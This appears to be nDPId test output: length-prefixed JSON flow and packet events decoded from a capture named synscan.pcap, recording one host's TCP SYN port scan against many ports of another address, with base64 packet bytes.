-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1635,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060902,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1635,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1625,"flow_packet_id":1,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060902,"pkt":"ACYLMQczACWzv5HuCABFAAAs0mIAADUGQRCsEAAIQA2GNIzSA3DdUoMYAAAAAGACCAAtHwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1636,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060902,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1755,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1636,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1626,"flow_packet_id":1,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060902,"pkt":"ACYLMQczACWzv5HuCABFAAAsh+cAACgGmIusEAAIQA2GNIzSBtvdUoMYAAAAAGACBAAttAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1637,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060902,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1637,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1627,"flow_packet_id":1,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060902,"pkt":"ACYLMQczACWzv5HuCABFAAAsf0wAADkGkCasEAAIQA2GNIzSwAfdUoMYAAAAAGACCABwhwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1638,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060902,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1638,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1628,"flow_packet_id":1,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060902,"pkt":"ACYLMQczACWzv5HuCABFAAAsmKkAACcGiMmsEAAIQA2GNIzSID7dUoMYAAAAAGACEAAIUQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1639,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1639,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1629,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsn+QAACsGfY6sEAAIQA2GNIzSBELdUoMYAAAAAGACEAAkTQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1640,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3324,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1640,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1630,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAs98kAADAGIKmsEAAIQA2GNIzSDPzdUoMYAAAAAGACBAAnkwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1641,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1641,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1631,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsrp0AADMGZtWsEAAIQA2GNIzSB9DdUoMYAAAAAGACEAAgvwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1642,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1642,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1632,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAspjMAADMGbz+sEAAIQA2GNIzSw1PdUoMYAAAAAGACEABlOwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1643,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9535,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1643,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1633,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsGwkAADUG+GmsEAAIQA2GNIzSJT\/dUoMYAAAAAGACCAALUAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1644,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1644,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1634,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsHDkAADYG9jmsEAAIQA2GNIzSAKHdUoMYAAAAAGACDAAr7gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1645,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1635,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsl+cAADIGfousEAAIQA2GNIzSIyjdUoMYAAAAAGACDAAJZwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1646,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1636,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAscOwAADQGo4asEAAIQA2GNIzSCDndUoMYAAAAAGACBAAsVgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1647,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1647,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1637,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAst4UAADMGXe2sEAAIQA2GNIzSBL3dUoMYAAAAAGACEAAj0gAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1648,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1648,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1638,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsFa0AACoGCMasEAAIQA2GNIzSSizdUoMYAAAAAGACDADiYgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1649,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1649,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1639,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsN6IAADgG2NCsEAAIQA2GNIzSApzdUoMYAAAAAGACBAAx8wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1650,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1650,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1640,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAssMQAACwGa66sEAAIQA2GNIzSACHdUoMYAAAAAGACBAA0bgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1651,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5859,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1651,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1641,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsLEAAADgG5DKsEAAIQA2GNIzSFuPdUoMYAAAAAGACBAAdrAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1652,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1652,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1642,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsl+oAACgGiIisEAAIQA2GNIzSgAndUoMYAAAAAGACBAC0hQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1653,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56738,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1653,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1643,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsHdEAADUG9aGsEAAIQA2GNIzS3aLdUoMYAAAAAGACCABS7AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1654,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060903,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1654,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1644,"flow_packet_id":1,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060903,"pkt":"ACYLMQczACWzv5HuCABFAAAsiq8AAC4Gj8OsEAAIQA2GNIzSI4vdUoMYAAAAAGACDAAJBAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1655,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1655,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1645,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAso2cAACwGeQusEAAIQA2GNIzSD83dUoMYAAAAAGACBAAkwgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1656,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1656,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1646,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsQAcAADQG1GusEAAIQA2GNIzSBEbdUoMYAAAAAGACBAAwSQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1657,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1657,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1647,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsJQwAACwG92asEAAIQA2GNIzSCBTdUoMYAAAAAGACBAAsewAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1658,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1658,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1648,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAs5EoAADgGLCisEAAIQA2GNIzSH5PdUoMYAAAAAGACBAAU\/AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1659,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 